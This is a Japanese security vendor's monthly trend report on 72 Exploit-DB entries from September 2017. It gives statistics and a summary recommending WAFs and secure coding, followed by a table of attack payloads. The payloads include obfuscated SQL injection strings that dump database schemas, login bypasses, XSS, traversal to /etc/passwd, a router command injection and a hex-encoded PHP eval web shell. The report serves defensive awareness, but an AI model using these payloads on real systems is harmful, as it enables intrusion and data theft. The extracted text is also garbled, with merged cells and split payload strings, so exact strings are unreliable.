1. 脆弱性別件数
脆弱性カテゴリ 件数
ファイルアップロード(File Upload) 1 コマンドインジェクション(Command Injection) 2 クロスサイトスクリプティング(Cross Site Scripting:XSS) 2 ディレクトリトラバーサル(Directory Traversal) 5 SQLインジェクション(SQL Injection) 62 合計 72
2. 危険度別件数
危険度 件数 割合 早急対応要 64 88.89% 高 5 6.94% 中 3 4.17% 合計 72 100.00%3. 攻撃実行の難易度別件数
難易度 件数 割合 難 2 2.78% 中 29 40.28% 易 41 56.94% 合計 72 100.00%4. 主なソフトウェア別脆弱性発生件数
ソフトウェア名 件数 Joomla 2 A2billing 2 PHP Dashboards 2 Wordpress 1 ICHotelReservation 1 IC-T-Shirt 1 iGreeting Cards 1 PTC KSV1 Script 1 Wireless Repeater 1 ICProjectBidding 1 The Car Project 1 ICClassifieds 1 Ultimate HR System 1 Carlo Gavazzi Powersoft 1Cory Support 1
PTCEvolution 1
Pay Banner Text Link Ad 1
ICEstate 1
Online Invoice System 1
ICGrocery 1 EzInvoice 1 ICSurvey 1 EzBan 1 CodeMeter 1 My Builder Marketplace 1 ICLowBidAuction 1 Law Firm 1 ICAffiliateTracking 1 Restaurant Website Script 1 Enterprise Edition Payment Processor Script 1 Professional Service Booking 1 Apache Tomcat 1 Online Print Business 1
ICHelpDesk 1
Just Dial Marketplace 1 ICDental Clinic 1 Job Board Software 1 ICCallLimousine 1 Babysitter Website Script 1 ICProductConfigurator 1 Escort Marketplace 1
ICJewelry 1
JobStar Monster Clone Script 1
ICStudents 1 ICAutosales 1 ICTraveling 1 ICDutchAuction 1 ICDoctor Appointment 1 ICRestaurant software 1 AirStar Airbnb Clone Script 1
ICAuction 1
EduStar Udemy Clone Script 1
ICMLM 1
iTech StockPhoto Script 1 Carel PlantVisor 1 iTech Book Store Script 1 Indusoft Web Studio 1 inClick Cloud Server 1 Theater Management Script 1 Gr8 Multiple Search Engine Script 1 Adserver Script 1
FoodStar 1
Justdial Clone Script 1
osTicket 1
Contact Manager 1 XYZ Auto Classifieds 1 NETGEAR ReadyNAS Surveillance 1 Consumer Review Script 1 ICSiteBuilder 1 合計 72
2017.09.01~2017.09.31 Exploit-DB(http://exploit-db.com)より公開されている内容に基づいた脆弱性トレンド情報です。
サマリー 2017年9月に公開されたExploit-DBの脆弱性報告件数は、総72件であり、その中でSQLインジェクションが62件で最も多い件数で発見されました。9月に公開されたSQLインジェクション脆弱性は、攻撃を実行し易い方だと分類されました。何故なら、この攻撃はオンライン検索を 通じてダウンロードできる、攻撃ツールの使い方さえ知れば、誰にでも手軽に悪用できるからです。ですが、このような易い攻撃難易度持つ同時に、SQLインジェクションはその危険度が高すぎて、早急に対応が必要である攻撃に分類されました。幸いに、大部のSQLインジェクション攻撃 は、Webアプリケーションファイアウォール通じて容易に対応できます。よって、持続的なセキュリティを維持するためには、Webアプリケーションファイアウォールとセキュアコディングを活用した、多層防御を具現しなければなりません。ペンタセキュリティシステムズ株式会社R&Dセンター データセキュリティチーム
1 2 2 5 62 0 20 40 60 80脆弱性別件数
64 5 3危険度別件数
早急対応要 高 中 2 29 41攻撃実行の難易度別件数
難 中 易 2 2 2 1 1 1 1 1 1 1 1 1 1 1 1 1 1主なソフトウェア別脆弱性発生件数
Joomla A2billing PHP Dashboards Wordpress ICHotelReservation IC-T-Shirt iGreeting Cards PTC KSV1 Script Wireless Repeater ICProjectBidding The Car Project ICClassifieds Ultimate HR System日付き EDB番号 脆弱性カテゴリ 攻撃難脆弱性度 危険度 脆弱性名 攻撃コード 対称プログラム 対象環境
2017-09-01 42618 XSS 易 早急対応要 WordPress Plugin Participants Database < 1.7.5.10- XSS 脆弱性
POST http://localhost/?page_id=1 HTTP/1.1 Host:
User-Agent: Mozilla/5.0 Windows NT 6.1; WOW64 AppleWebKit/535.7 KHTML, like Gecko Chrome/16.0.912.75 Safari/535.7 Accept: */* Content-Type: application/x-www-form-urlencoded; charset=UTF-8 first_name=<script>alert("1");</script>&last_name=a&emai l=a@a.com Wordpress WordPress Plugin Participants Database < 1.7.5.10
2017-09-03 42607 SQL Injection 高 早急対応要 Joomla! Component CheckList 1.1.0 - SQL Injection 脆弱性 /our-products/checklist/checklist/tag/social'and+(SeLeCT+1+FrOM +(SeLeCT+count(*),COncaT((SeLeCT(SeLeCT+COncaT(cast( database()+as+char),0x7e))+FrOM+information_schema.tabl es+where+table_schema=database()+limit+0,1),floor(rand(0 )*2))x+FrOM+information_schema.tables+group+by+x)a)+A ND+''='.html
Joomla Joomla! Component CheckList 1.1.0
2017-09-03 42606 SQL Injection 易 早急対応要 Joomla! Component Survey Force Deluxe 3.2.4- 'invite' Parameter SQL Injection 脆弱性 /index.php?option=com_surveyforce&task=start_invited&survey=19&invite=1%20and%201=1-- Joomla
Joomla! Component Survey Force Deluxe
3.2.4
2017-09-04 42608 Command Injection 高 早急対応要 - Remote Code Execution 脆弱性Wireless Repeater BE126
POST /cgi-bin/webupg HTTP/1.1 Host:
User-Agent: Mozilla/5.0 Windows NT 6.1; WOW64 AppleWebKit/535.7 KHTML, like Gecko Chrome/16.0.912.75 Safari/535.7 Accept: */* Content-Type: application/x-www-form-urlencoded; charset=UTF-8 name=HTTP&url=http://www.test.com&user=;ls -al >/var/mycode;&password=a&port=8&dir=a
Wireless Repeater Wireless RepeaterBE126
2017-09-04 42610 XSS 高 高 CodeMeter 6.50- XSS 脆弱性
POST /actions/ChangeConfiguration.html HTTP/1.1 Host:
User-Agent: Mozilla/5.0 Windows NT 6.1; WOW64 AppleWebKit/535.7 KHTML, like Gecko Chrome/16.0.912.75 Safari/535.7 Accept: */* Content-Type: application/x-www-form-urlencoded; charset=UTF-8 Action=CertifiedTimeConfiguration&TimeServerList=cmtime.c odemeter.com%7Ccmtime.codemeter.de%7Ccmtime.codeme ter.us%7Ccmtime.codehacker.de/>"<img src="evil.source" onload=alert("GUTENMORGEN")>%7C CodeMeter CodeMeter 6.50
2017-09-04 42617 SQL Injection 高 早急対応要 iGreeting Cards 1.0 - SQL Injection 脆弱性
/index.php?index&search&k=eFe'+/*!11112UnIoN*/(/*!1111 2SelEcT*/+0x283129,VERSioN(),0x283329,0x283429,0x2835
29,0x283629,0x283729,0x283829)--+-iGreeting Cards iGreeting Cards 1.0
2017-09-04 42616 SQL Injection 難 早急対応要 - SQL Injection 脆弱性A2billing 2.x
POST /a2billing/agent/Public/checkout_process.php HTTP/1.1 Host:
User-Agent: Mozilla/5.0 Windows NT 6.1; WOW64 AppleWebKit/535.7 KHTML, like Gecko Chrome/16.0.912.75 Safari/535.7
Accept: */*
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
transactionID=456789111111 unise//**lecton selinse//**rtect 1,2,3,4,0x706c75676e706179,0x3c3f706870206576616c2862 61736536345f6465636f646528245f504f53545b6e61696c6974 5d29293b203f3e,7,8,9,10,11,12,13//**
-&sess_id=4148&key=98346a2b29c131c78dc89b50894176eb
A2billing A2billing 2.x
2017-09-05 42619 SQL Injection 易 早急対応要 - SQL Injection 脆弱性The Car Project 1.0
/info.php?car_id=-5+/*!11122uNiOn*/(/*!11122sELect*/0x283129,0x283229,/* !11122CONCAT_WS*/(0x203a20,/*!11122USER*/(),/*!11122 DATABASE*/(),VERSION()),0x283429,0x283529,0x283629,0x 283729,0x283829,0x283929,0x28313029,0x28313129,0x2831 3229,0x28313329,0x28313429,0x28313529,0x28313629,0x28 313729,0x28313829,0x28313929,0x28323029,0x28323129,0x 28323229,0x28323329,0x28323429,0x28323529,0x28323629 ,0x28323729,0x28323829,0x28323929,0x28333029,0x283331 29,0x28333229,0x28333329,0x28333429,0x28333529,0x2833 3629,0x28333729,0x28333829,0x28333929,0x28343029,0x28 343129,0x28343229,0x28343329,(44),0x28343529,0x283436 29,0x28343729,0x28343829,0x28343929)
The Car Project The Car Project 1.0
2017-09-05 42615 SQL Injection 高 早急対応要 - SQL Injection 脆弱性A2billing 2.x
POST /a2billing/agent/Public/checkout_process.php HTTP/1.1 Host:
User-Agent: Mozilla/5.0 Windows NT 6.1; WOW64 AppleWebKit/535.7 KHTML, like Gecko Chrome/16.0.912.75 Safari/535.7 Accept: */* Content-Type: application/x-www-form-urlencoded; charset=UTF-8 transactionID=1%20and%201=1--&sess_id=4148key=636902c6ed0db5780eb613d126e95268 A2billing A2billing 2.x
2017-09-05 42628 Directory Traversal 易 高 Ultimate HR System <= 1.2- Directory Traversal 脆弱性 /download?type=document&filename=../../../../../etc/passwd Ultimate HR System Ultimate HR System<= 1.2
2017-09-06 42620 SQL Injection 易 早急対応要 - 'pr' Parameter SQL Injection 脆弱性Cory Support /listfaq.php?pr=9999+and+1=2+union+all+select+null,version()-- Cory Support Cory Support
2017-09-06 42623 SQL Injection 易 早急対応要 Pay Banner Text Link Ad 1.0.6.1- SQL Injection 脆弱性 /index.php?action=stats&id=1%20and%201=1-- Pay Banner Text Link Ad Pay Banner Text LinkAd 1.0.6.1
2017-09-07 42629 SQL Injection 高 早急対応要 Online Invoice System 3.0 - SQL Injection 脆弱性 /editclient.php?cid=-5+/*!00003uNiOn*/(/*!00003SelECt*/+0x283129,/*!50000C ONCAT_WS*/(0x203a20,USER()),/*!50000CONCAT_WS*/(0x 203a20,DATABASE()),/*!50000CONCAT_WS*/(0x203a20,VER SION()),0x283529,(/*!50000SelECt*/+export_set(5,@:=0,(S elECt+CoUnt(*)from(information_schema.columns)where@: =export_set(5,export_set(5,@,table_name,0x3c6c693e,2),col umn_name,0xa3a,2)),@,2)),0x283729,0x283829,0x283929,0 x28313029,0x28313129,0x28313229,0x28313329,0x2831342 9,0x28313529,0x28313629,0x28313729,0x28313829,0x28313 929,0x28323029,0x28323129,0x28323229,0x28323329,0x283
23429,0x28323529,0x28323629)--+-Online Invoice System Online Invoice System 3.0 2017-09-07 42632 SQL Injection 高 早急対応要 EzInvoice 6.02 - SQL Injection 脆弱性 /editclient.php?id=-100+/*!11122UniOn*/+/*!11122SeleCt*/+0x283129,/*!1112 2CONCAT_WS*/(0x203a20,/*!11122USER*/(),/*!11122DATA BASE*/(),VERSION()),0x283329,/*!11122CONCAT_WS*/(0x2 03a20,/*!11122USER*/(),/*!11122DATABASE*/(),VERSION() ),/*!11122CONCAT_WS*/(0x203a20,/*!11122USER*/(),/*!11 122DATABASE*/(),VERSION()),/*!11122CONCAT_WS*/(0x20 3a20,/*!11122USER*/(),/*!11122DATABASE*/(),VERSION()) --+-EzInvoice EzInvoice 6.02 2017.09.01~2017.09.31 Exploit-DB(http://exploit-db.com)より公開されている内容に基づいた脆弱性トレンド情報です。
EDB-Report
最新脆弱性トレンドレポート (2017.09)日付き EDB番号 脆弱性カテゴリ 攻撃難脆弱性度 危険度 脆弱性名 攻撃コード 対称プログラム 対象環境 2017.09.01~2017.09.31 Exploit-DB(http://exploit-db.com)より公開されている内容に基づいた脆弱性トレンド情報です。
2017-09-07 42631 SQL Injection 高 早急対応要 EzBan 5.3 - 'id' Parameter SQL Injection 脆弱性
/ezban.php?id=100++aND(/*!00002SelEcT*/+0x30783331+/ *!00002frOM*/+(/*!00002SelEcT*/+cOUNT(*),/*!00002cOnC aT*/((/*!00002sELECT*/(/*!00002sELECT*/+/*!00002cOnCa T*/(cAST(dATABASE()+aS+/*!00002cHAR*/),0x7e,0x496873 616E53656e63616e))+/*!00002FRoM*/+iNFORMATION_sCHE MA.tABLES+/*!00002wHERE*/+tABLE_sCHEMA=dATABASE() +lIMIT+0,1),fLOOR(/*!00002rAND*/(0)*2))x+/*!00002FRoM */+iNFORMATION_sCHEMA.tABLES+gROUP+bY+x)a)+/*!000 02aNd*/+1=1&action=show EzBan EzBan 5.3
2017-09-09 42645 SQL Injection 易 早急対応要 My Builder Marketplace 1.0- SQL Injection 脆弱性 /marketplace?start_date=1%20and%201=1-- My Builder Marketplace My Builder Marketplace1.0
2017-09-09 42643 SQL Injection 易 早急対応要 - SQL Injection 脆弱性Law Firm 1.0
/business-searchlist?country=1%20and%201=1-- &state=1%20and%201=1--&city=1%20and%201=1--
&farm_cat=1%20and%201=1--Law Firm Law Firm 1.0
2017-09-09 42642 SQL Injection 易 早急対応要 Restaurant Website Script 1.0- SQL Injection 脆弱性
/cms.php?id=-6'++/*!00002UNION*/+/*!00002SELECT*/+0x31,0x32,0x33, (Select+export_set(5,@:=0,(select+count(*)from(informatio n_schema.columns)where@:=export_set(5,export_set(5,@,t able_name,0x3c6c693e,2),column_name,0xa3a,2)),@,2)),0x 35,0x36,0x37,0x38,0x39,0x3130,0x3131,0x3132,0x3133,0x31
34,0x3135,0x3136,0x3137,0x3138,19,20,0x3231,0x3232--+-Restaurant Website Script Restaurant WebsiteScript 1.0
2017-09-09 42641 SQL Injection 高 早急対応要 Professional Service Booking 1.0- SQL Injection 脆弱性
/content.php?page=-7+/*!50000UniOn*/+/*!50000SelECt*/+0x496873616e20536 56e63616e,(Select+export_set(5,@:=0,(select+count(*)from (information_schema.columns)where@:=export_set(5,export _set(5,@,table_name,0x3c6c693e,2),column_name,0xa3a,2))
,@,2))--Professional Service Booking Professional ServiceBooking 1.0
2017-09-09 42640 SQL Injection 高 早急対応要 Online Print Business 1.0- SQL Injection 脆弱性
/product-decs.php?cat_id=-149++/*!50000UNION*/(/*!50000SELECT*/+0x283129,0x28 3229,0x283329,0x283429,0x283529,0x283629,0x283729,0x2 83829,0x283929,0x28313029,0x28313129,0x28313229,0x283 13329,0x28313429,0x28313529,0x28313629,0x28313729,0x2 8313829,0x28313929,0x28323029,0x28323129,0x28323229, 0x28323329,0x28323429,0x28323529,(Select+export_set(5, @:=0,(select+count(*)from(information_schema.columns)wh ere@:=export_set(5,export_set(5,@,table_name,0x3c6c693e ,2),column_name,0xa3a,2)),@,2)),0x28323729,0x28323829,
0x28323929)--Online Print Business Online Print Business1.0
2017-09-09 42639 SQL Injection 高 早急対応要 Just Dial Marketplace 1.0- SQL Injection 脆弱性 /result/1%20and%201=1--/eFe/ Just Dial Marketplace Just Dial Marketplace1.0
2017-09-09 42637 SQL Injection 高 早急対応要 Job Board Software 1.0 - SQL Injection 脆弱性 /job-details/-131'+/*!50000UNION*/(/*!50000SELECT*/+0x283129,0x283 229,0x283329,(Select+export_set(5,@:=0,(select+count(*)fr om(information_schema.columns)where@:=export_set(5,exp ort_set(5,@,table_name,0x3c6c693e,2),column_name,0xa3a, 2)),@,2)),0x283529,0x283629,0x283729,0x283829,0x283929 ,0x28313029,0x28313129,0x28313229,0x28313329,0x283134 29,0x28313529,0x28313629,0x28313729,0x28313829,0x2831 3929,0x28323029,0x28323129,0x28323229,0x28323329,0x28 323429,0x28323529,0x28323629,0x28323729,0x28323829,0x 28323929,0x28333029,0x28333129,0x28333229,0x28333329 ,0x28333429,0x28333529,0x28333629,0x28333729,0x283338 29,0x28333929,0x28343029,0x28343129,0x28343229)--/eFe
Job Board Software Job Board Software 1.0
2017-09-09 42636 SQL Injection 高 早急対応要 Babysitter Website Script 1.0- SQL Injection 脆弱性
/taskers?skills=63'AnD+(/*!44455sEleCT*/+0x31+/*!44455Fr OM*/+(/*!44455sEleCT*/+cOUNT(*),/*!44455CoNCAt*/((/*! 44455sEleCT*/(/*!44455sEleCT*/+/*!44455CoNCAt*/(cAst(d ATABASE()+As+char),0x7e,0x496873616E53656e63616e))+/ *!44455FrOM*/+infOrMation_schEma.tables+/*!44455WherE */+table_schema=dATABASE()+limit+0,1),floor(raND(0)*2)) x+/*!44455FrOM*/+infOrMation_schEma.tABLES+/*!44455g ROUP*/+bY+x)a)+aND+1=1='
Babysitter Website Script Babysitter WebsiteScript 1.0
2017-09-09 42635 SQL Injection 高 早急対応要 Escort Marketplace 1.0- SQL Injection 脆弱性
/prof_detils.html?escort=-1418820035'+/*!11112UnIoN*/+(/*!11112SelEcT*/0x283129 ,0x283229,0x283329,0x283429,(Select+export_set(5,@:=0,( /*!11112SelEcT*/+count(*)from(information_schema.column s)where@:=export_set(5,export_set(5,@,table_name,0x3c6c 693e,2),column_name,0xa3a,2)),@,2)),0x283629,0x283729, 0x283829,0x283929,0x28313029,0x28313129,0x28313229,0x
28313329,0x28313429,0x28313529,0x28313629)--Escort Marketplace Escort Marketplace 1.0
2017-09-11 42655 SQL Injection 易 早急対応要 JobStar Monster Clone Script 1.0- SQL Injection 脆弱性 /jobdetailshow?id=1%20and%201=1-- JobStar Monster Clone Script JobStar Monster CloneScript 1.0 2017-09-11 42654 SQL Injection 易 早急対応要 PHP Dashboards NEW 4.4- SQL Injection 脆弱性 /php/share/save.php?dashID=1%20and%201=1-- PHP Dashboards PHP Dashboards NEW4.4 2017-09-11 42653 Directory Traversal 易 高 - Directory Traversal 脆弱性PHP Dashboards NEW 4.4 /php/file/read.php?filename=../../../etc/passwd PHP Dashboards PHP Dashboards NEW4.4
2017-09-11 42659 SQL Injection 高 早急対応要 AirStar Airbnb Clone Script 1.0- SQL Injection 脆弱性
/airstar/hotel/roomsedit/detailedroom/6 AND 8995=8995?mem_count=1&check_in=&check_out=&search_ city=Madurai,India&min_amt=10&max_amt=150&inout=0
AirStar Airbnb Clone Script AirStar Airbnb CloneScript 1.0
2017-09-11 42658 SQL Injection 易 早急対応要 EduStar Udemy Clone Script 1.0- SQL Injection 脆弱性 /courses/details?course_id=105 and 1=1 EduStar Udemy Clone Script EduStar Udemy CloneScript 1.0
2017-09-11 42657 SQL Injection 易 早急対応要 iTech StockPhoto Script 2.02- SQL Injection 脆弱性
POST / HTTP/1.1 Host:
User-Agent: Mozilla/5.0 Windows NT 6.1; WOW64 AppleWebKit/535.7 KHTML, like Gecko Chrome/16.0.912.75 Safari/535.7
Accept: */*
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
stock=19 AND 9771=9771
iTech StockPhoto Script iTech StockPhoto Script2.02
2017-09-11 42656 SQL Injection 易 早急対応要 iTech Book Store Script 2.02- SQL Injection 脆弱性 /book_details.php?id=id=2 AND SLEEP(5)-- iTech Book Store Script iTech Book Store Script2.02
2017-09-12 42663 SQL Injection 高 早急対応要 inClick Cloud Server 5.0- SQL Injection 脆弱性
/client.php?pageid=sites&subpid=modify&site_id=1-1++/*!00008UniOn*/+/*!00008sEleCT*/+0x283129,0x28322 9,0x283329,0x283429,(Select+export_set(5,@:=0,(select+co unt(*)from(information_schema.columns)where@:=export_s et(5,export_set(5,@,table_name,0x3c6c693e,2),column_nam e,0xa3a,2)),@,2)),0x283629,0x283729,0x283829,0x283929,0
x28313029,0x28313129--inClick Cloud Server inClick Cloud Server 5.0
2017-09-12 42662 SQL Injection 高 早急対応要 Gr8 Multiple Search Engine Script 1.0
- SQL Injection 脆弱性 /1%20and%201=1--/X.html Gr8 Multiple Search Engine Script
Gr8 Multiple Search Engine Script 1.0 2017-09-12 42661 SQL Injection 易 早急対応要 - SQL Injection 脆弱性FoodStar 1.0 /public/frontend/search?keyword=1%20and%201=1-- FoodStar FoodStar 1.0
2017-09-12 42660 SQL Injection 難 早急対応要 - SQL Injection 脆弱性osTicket 1.10 /file.php?key[id` = 1 UNION SELECT 1,2,3--]=1&signature=1&expires=15104725311 osTicket osTicket 1.10
2017-09-12 42727 SQL Injection 高 早急対応要 XYZ Auto Classifieds 1.0- SQL Injection 脆弱性 /xyz-auto-classifieds/item/view/13 and sleep(5) XYZ Auto Classifieds XYZ Auto Classifieds 1.0 2017-09-12 42728 SQL Injection 易 早急対応要 Consumer Review Script 1.0- SQL Injection 脆弱性 /review-details.php?idvalue=9 and sleep(5) Consumer Review Script Consumer ReviewScript 1.0 2017-09-13 42689 SQL Injection 易 早急対応要 - SQL Injection 脆弱性ICSiteBuilder 1.1 /index.php?page=news&nid=1%20and%201=1-- ICSiteBuilder ICSiteBuilder 1.1
日付き EDB番号 脆弱性カテゴリ 攻撃難脆弱性度 危険度 脆弱性名 攻撃コード 対称プログラム 対象環境 2017.09.01~2017.09.31 Exploit-DB(http://exploit-db.com)より公開されている内容に基づいた脆弱性トレンド情報です。
EDB-Report
最新脆弱性トレンドレポート (2017.09)2017-09-13 42688 SQL Injection 易 早急対応要 - 'pk' Parameter SQL Injection 脆弱性ICHelpDesk 1.1 /index.php?page=static_pages&pk=1%20and%201=1-- ICHelpDesk ICHelpDesk 1.1 2017-09-13 42687 SQL Injection 易 早急対応要 ICEstate 1.1
- 'id' Parameter SQL Injection 脆弱性 /details.aspx?id=1%20and%201=1-- ICEstate ICEstate 1.1 2017-09-13 42686 SQL Injection 易 早急対応要 - 'key' Parameter SQL Injection 脆弱性ICDental Clinic 1.2 /index.php?page=static_pages&key=1%20and%201=1-- ICDental Clinic ICDental Clinic 1.2 2017-09-13 42685 SQL Injection 易 早急対応要 - SQL Injection 脆弱性ICProjectBidding 1.1 /admin/editadminuser.php?id=1%20and%201=1-- ICProjectBidding ICProjectBidding 1.1 2017-09-13 42684 SQL Injection 易 早急対応要 - 'key' Parameter SQL Injection 脆弱性ICCallLimousine 1.1 /index.php?page=static_pages&key=1%20and%201=1-- ICCallLimousine ICCallLimousine 1.1 2017-09-13 42682 SQL Injection 易 早急対応要 ICGrocery 1.1
- 'key' Parameter SQL Injection 脆弱性 /index.php?page=static_pages&key=1%20and%201=1-- ICGrocery ICGrocery 1.1 2017-09-13 42681 SQL Injection 易 早急対応要 - 'key' Parameter SQL InjectionICProductConfigurator 1.1 /index.php?page=static_pages&key=1%20and%201=1-- ICProductConfigurator ICProductConfigurator1.1 2017-09-13 42680 SQL Injection 易 早急対応要 - 'key' Parameter SQL Injection 脆弱性IC-T-Shirt 1.2 /index.php?page=static_pages&key=1%20and%201=1-- IC-T-Shirt IC-T-Shirt 1.2 2017-09-13 42679 SQL Injection 易 早急対応要 - 'key' Parameter SQL Injection 脆弱性ICJewelry 1.1 /index.php?page=static_pages&key=1%20and%201=1-- ICJewelry ICJewelry 1.1 2017-09-13 42678 SQL Injection 易 早急対応要 - SQL Injection 脆弱性ICSurvey 1.1 /survey.php?page=preview&test=1%20and%201=1-- ICSurvey ICSurvey 1.1
2017-09-13 42677 SQL Injection 高 早急対応要 - 'key' Parameter SQL Injection 脆弱性ICStudents 1.2
/index.php?page=static_page&key=-EfE'+/*!00009UniOn*/+/*!00009SelEcT*/+0x31,0x32,0x3c68 313e494853414e2053454e43414e3c2f68313e,(/*!00009Selec t*/+export_set(5,@:=0,(/*!00009select*/+count(*)from(info rmation_schema.columns)where@:=export_set(5,export_set( 5,@,/*!00009table_name*/,0x3c6c693e,2),/*!00009column_ name*/,0xa3a,2)),@,2))--ICStudents ICStudents 1.2
2017-09-13 42676 SQL Injection 高 早急対応要 - SQL Injection 脆弱性ICClassifieds 1.1
/post_details.php?city=0&id=-3061'++/*!00004UNION*/+/*!00004SELECT*/+0x31,0x32,0 x33,0x34,0x35,0x36,(/*!00004Select*/+export_set(5,@:=0,( /*!00004select*/+count(*)from(information_schema.columns )where@:=export_set(5,export_set(5,@,/*!00004table_name */,0x3c6c693e,2),/*!00004column_name*/,0xa3a,2)),@,2)), 0x496873616e2053656e63616e,0x39,0x3130,0x3131,0x3132, 0x3133,0x3134,0x3135,0x3136,0x3137--ICClassifieds ICClassifieds 1.1
2017-09-13 42675 SQL Injection 易 早急対応要 - SQL Injection 脆弱性ICTraveling 2.2
POST /admin HTTP/1.1 Host:
User-Agent: Mozilla/5.0 Windows NT 6.1; WOW64 AppleWebKit/535.7 KHTML, like Gecko Chrome/16.0.912.75 Safari/535.7 Accept: */* Content-Type: application/x-www-form-urlencoded; charset=UTF-8 user='or 1=1 or ''='&pass='anything' ICTraveling ICTraveling 2.2
2017-09-13 42674 SQL Injection 易 早急対応要 - SQL Injection 脆弱性ICAutosales 2.2 /index.php?cmd=advertise_details&category=car&aid=1%20and%201=1-- ICAutosales ICAutosales 2.2
2017-09-13 42673 SQL Injection 易 早急対応要 - SQL Injection 脆弱性ICDutchAuction 1.2 /admin/viewuserips.php?id=1%20and%201=1-- ICDutchAuction ICDutchAuction 1.2 2017-09-13 42672 SQL Injection 易 早急対応要 ICRestaurant software 1.4
- 'key' Parameter SQL Injection 脆弱性 /index.php?page=static_pages&key=1%20and%201=1-- ICRestaurant software
ICRestaurant software 1.4 2017-09-13 42671 SQL Injection 易 早急対応要 - 'key' Parameter SQL Injection 脆弱性ICDoctor Appointment 1.3 /index.php?page=static_pages&key=1%20and%201=1-- ICDoctor Appointment ICDoctor Appointment1.3 2017-09-13 42670 SQL Injection 易 早急対応要 - 'id' Parameter SQL Injection 脆弱性ICAuction 2.2 /item.php?id=1%20and%201=1-- ICAuction ICAuction 2.2 2017-09-13 42669 SQL Injection 易 早急対応要 - 'key' Parameter SQL Injection 脆弱性ICHotelReservation 3.3 /index.php?page=static_pages&key=1%20and%201=1-- ICHotelReservation ICHotelReservation 3.3
2017-09-13 42668 SQL Injection 高 早急対応要 ICMLM 2.1 - 'key' Parameter SQL Injection 脆弱性
/index.php?page=static_pages&key='+/*!00007uNiOn*/+/*! 00007SelEct*/+0x283129,0x283229,0x3c68313e496873616e 2053656e63616e3c2f68313e,(/*!50000Select*/+export_set(5 ,@:=0,(/*!50000select*/+count(*)from(information_schema. columns)where@:=export_set(5,export_set(5,@,/*!50000tab le_name*/,0x3c6c693e,2),/*!50000column_name*/,0xa3a,2) ),@,2))--ICMLM ICMLM 2.1
2017-09-13 42667 SQL Injection 易 早急対応要 - SQL Injection 脆弱性ICLowBidAuction 3.3 /admin/editadminuser.php?id=1%20and%201=1-- ICLowBidAuction ICLowBidAuction 3.3 2017-09-13 42706 Directory Traversal 高 中 Carel PlantVisor 2.4.4
- Directory Traversal 脆弱性 /..%5c/..%5c/..%5c/..%5c/..%5c/..%5ctest.txt Carel PlantVisor Carel PlantVisor 2.4.4 2017-09-13 42705 Directory Traversal 易 中 Carlo Gavazzi Powersoft 2.1.1.1- Directory Traversal 脆弱性 /../../../../../../../../../../../text.txt?res=&valid=true Carlo Gavazzi Powersoft Carlo Gavazzi Powersoft2.1.1.1 2017-09-13 42699 Directory Traversal 易 中 - Directory Traversal 脆弱性Indusoft Web Studio /../../../../../../../../../../../text.txt Indusoft Web Studio Indusoft Web Studio
2017-09-13 42690 SQL Injection 易 早急対応要 ICAffiliateTracking 1.1- SQL Injection 脆弱性
POST /icaffiliatetracking/adminlogin.asp HTTP/1.1 Host:
User-Agent: Mozilla/5.0 Windows NT 6.1; WOW64 AppleWebKit/535.7 KHTML, like Gecko Chrome/16.0.912.75 Safari/535.7 Accept: */* Content-Type: application/x-www-form-urlencoded; charset=UTF-8 user='or 1=1 or ''='&pass='anything' ICAffiliateTracking ICAffiliateTracking 1.1
2017-09-14 42716 SQL Injection 高 早急対応要 Theater Management Script - SQL Injection 脆弱性 /show-time.php?moid=-100'++/*!08888UNION*/(/*!08888SELECT*/0x283129,0x283 229,0x283329,0x283429,0x283529,0x283629,0x283729,0x28 3829,0x283929,0x28313029,0x28313129,(/*!08888Select*/+ export_set(5,@:=0,(/*!08888select*/+count(*)/*!08888from */(information_schema.columns)where@:=export_set(5,expo rt_set(5,@,/*!08888table_name*/,0x3c6c693e,2),/*!08888co lumn_name*/,0xa3a,2)),@,2)),0x28313329,0x28313429,0x2 8313529,0x28313629,0x28313729,0x28313829,0x28313929,
0x28323029,0x28323129,0x28323229,0x28323329)--Theater Management Script Theater Management Script
2017-09-14 42715 SQL Injection 高 早急対応要 - 'type' Parameter SQL Injection 脆弱性PTC KSV1 Script 1.7
/gpt.php?v=entry&type=+'++aND(/*!00000sELeCT*/+0x307 83331+/*!00000FrOM*/+(/*!00000SeLeCT*/+cOUNT(*),/*!0 0000CoNCaT*/((sELEcT(sELECT+/*!00000CoNCAt*/(cAST(dA TABASE()+aS+cHAR),0x7e,0x496873616E53656e63616e))+f ROM+iNFORMATION_sCHEMA.tABLES+wHERE+tABLE_sCHEM A=dATABASE()+lIMIT+0,1),fLOOR(rAND(0)*2))x+fROM+iNF ORMATION_sCHEMA.tABLES+gROUP+bY+x)a) AND ''='&id=1& PTC KSV1 Script PTC KSV1 Script 1.7
2017-09-14 42714 SQL Injection 高 早急対応要 - SQL Injection 脆弱性Adserver Script 5.6
/manage-target.php?id=13-13'+/*!00008union*/+/*!00008select*/++/*!00008CONCAT_ WS*/(0x203a20,USER(),DATABASE(),VERSION())--+-&wap=0
Adserver Script Adserver Script 5.6
2017-09-14 42713 SQL Injection 高 早急対応要 Enterprise Edition Payment Processor Script 3.7 - SQL Injection 脆弱性 /products?id=-1++/*!00002UNION*/(/*!00002SELECT*/+0x283129,0x2832 29,0x283329,0x283429,0x283529,0x283629,0x283729,0x283 829,0x283929,0x28313029,0x28313129,0x28313229,0x28313 329,0x28313429,0x28313529,0x28313629,/*!00002CONCAT_ WS*/(0x203a20,USER(),DATABASE(),VERSION()))--+-&action=update
Enterprise Edition Payment Processor Script
Enterprise Edition Payment Processor
日付き EDB番号 脆弱性カテゴリ 攻撃難脆弱性度 危険度 脆弱性名 攻撃コード 対称プログラム 対象環境 2017.09.01~2017.09.31 Exploit-DB(http://exploit-db.com)より公開されている内容に基づいた脆弱性トレンド情報です。
2017-09-14 42717 SQL Injection 高 早急対応要 Justdial Clone Script - 'fid' Parameter SQL Injection 脆弱性
/restaurants-details.php?fid=46'++aND(/*!00000sELeCT*/+0x30783331+ /*!00000FrOM*/+(/*!00000SeLeCT*/+cOUNT(*),/*!00000Co NCaT*/((sELEcT(sELECT+/*!00000CoNCAt*/(cAST(dATABASE ()+aS+cHAR),0x7e,0x496873616E53656e63616e))+fROM+iN FORMATION_sCHEMA.tABLES+wHERE+tABLE_sCHEMA=dATA BASE()+lIMIT+0,1),fLOOR(rAND(0)*2))x+fROM+iNFORMATI ON_sCHEMA.tABLES+gROUP+bY+x)a) AND ''='
Justdial Clone Script Justdial Clone Script
2017-09-15 42733 SQL Injection 高 早急対応要 - SQL Injection 脆弱性PTCEvolution 5.50
